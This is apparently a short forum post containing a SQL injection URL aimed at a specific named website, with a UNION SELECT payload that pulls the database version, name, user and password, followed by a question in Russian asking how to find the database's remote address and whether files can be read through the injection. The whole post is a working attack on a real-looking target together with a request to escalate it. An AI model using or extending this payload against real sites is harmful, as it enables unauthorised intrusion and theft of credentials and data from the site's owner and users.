http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД + можно там файлы посмотреть через иньекцию